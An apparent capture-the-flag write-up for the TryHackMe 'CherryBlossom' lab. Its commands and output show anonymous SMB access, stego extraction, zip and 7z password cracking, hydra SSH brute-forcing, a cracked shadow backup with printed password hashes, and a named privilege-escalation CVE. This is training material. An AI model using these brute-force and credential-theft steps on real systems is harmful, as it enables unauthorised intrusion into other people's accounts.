tryhackme // 2026-01-07 // ID: REF-CherryBlossom

CherryBlossom


PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 62
139/tcp open  netbios-ssn  syn-ack ttl 62
445/tcp open  microsoft-ds syn-ack ttl 62

Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (SMB: Failed to receive bytes: TIMEOUT)
|   account_used: <blank>
|   \\10.64.149.126\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.7.6-Ubuntu)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|_    Anonymous access: READ/WRITE
smbclient //10.64.149.126/Anonymous -N -t 900

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb  9 19:22:51 2020
  ..                                  D        0  Sun Feb  9 12:48:18 2020
  journal.txt                         N  3470998  Sun Feb  9 19:20:53 2020
ge
                10253588 blocks of size 1024. 4671704 blocks available
smb: \> get journal.txt
getting file \journal.txt of size 3470998 as journal.txt (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
cat journal.txt | base64 -d > output

file output
output: PNG image data, 1280 x 853, 8-bit/color RGB, non-interlaced
stegpy output         
File _journal.zip succesfully extracted from output

unzip _journal.zip
Archive:  _journal.zip
file #1:  bad zipfile offset (local header sig):  0

file _journal.zip
_journal.zip: JPEG image data


ls
journal.txt  _journal.zip  output

fcrackzip -uDp /usr/share/wordlists/rockyou.txt _journal.zip
found id d8ffd8ff, '_journal.zip' is not a zipfile ver 2.xx, skipping
no usable files found

it thinks it’s a JPEG…
Open it up in hexeditor and we’ll check to see if it’s had its magic number tampered with:

Well, considering that the magic number for a standard .zip zipfile is 50 4B 03 04, I have a feeling we might be right on the money with this one.

file _journal.zip _journal.zip: Zip archive data, made by v3.0 UNIX, extract using at least v2.0, last modified Feb 10 2020 00:01:42, uncompressed size 70434, method=deflate

fcrackzip -uDp /usr/share/wordlists/rockyou.txt  _journal.zip
PASSWORD FOUND!!!!: pw == september
/usr/share/john/7z2john.pl Journal.ctz > hash.txt
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8

Press 'q' or Ctrl-C to abort, almost any other key for status
tigerlily        (Journal.ctz)     
1g 0:00:01:55 DONE (2025-12-24 12:47) 0.008660g/s 48.49p/s 48.49c/s . 
└─$ 7z e Journal.ctz

7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
 64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 70434 bytes (69 KiB)

Extracting archive: Journal.ctz
--
Path = Journal.ctz
Type = 7z
Physical Size = 70434
Headers Size = 146
Method = LZMA2:16 7zAES
Solid = -
Blocks = 1


Enter password (will not be echoed):
Everything is Ok

Size:       158136
Compressed: 70434

now can open Journal.ctd and find more info and can find user and can be found some wordlists that user used to create pwds

so i decode all and make all that wordlists and use into bruteforce user ssh

└─$ hydra -l lily -P cherry-blossom.txt ssh://10.64.149.126
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-24 13:18:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://10.64.149.126:22/
[22][ssh] host: 10.64.149.126   login: lily   password: Mr.$un$hi..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-24 13:18:50
[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root shadow 771 Feb  9  2020 /var/backups/gshadow.bak
-r--r--r-- 1 root shadow 1481 Feb  9  2020 /var/backups/shadow.bak
-rw------- 1 root root 936 Feb  9  2020 /var/backups/group.bak
-rw------- 1 root root 2382 Feb  9  2020 /var/backups/passwd.bak
/var/backups/shadow.bak
johan:$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0:18301:0:99999:7:::
lily:$6$3GPkY0ZP$6zlBpNWsBHgo6X5P7kI2JG6loUkZBIOtuOxjZpD71spVdgqM4CTXMFYVScHHTCDP0dG2rhDA8uC18/Vid3JCk0:18301:0:99999:7:::
sshd:*:18301:0:99999:7:::
john --wordlist=cherry-blossom.txt hashes.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.$un$hin3      (lily)     
##scuffleboo##   (johan)     
2g 0:00:00:03 DONE (2025-12-24 13:42) 0.5988g/s 2146p/s 2299c/s 2299C/s #shauna#..#imab#3899261#
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
lily@cherryblossom:~$ su johan
Password: 

johan@cherryblossom:~$ ls -la
total 48

-rw-rw-r--  1 johan johan   38 Feb 10  2020 user.txt
-rw-rw-r--  1 johan johan  180 Feb  9  2020 .wget-hsts
johan@cherryblossom:~$ cat user.txt

CVE-2019-18364

root/root.txt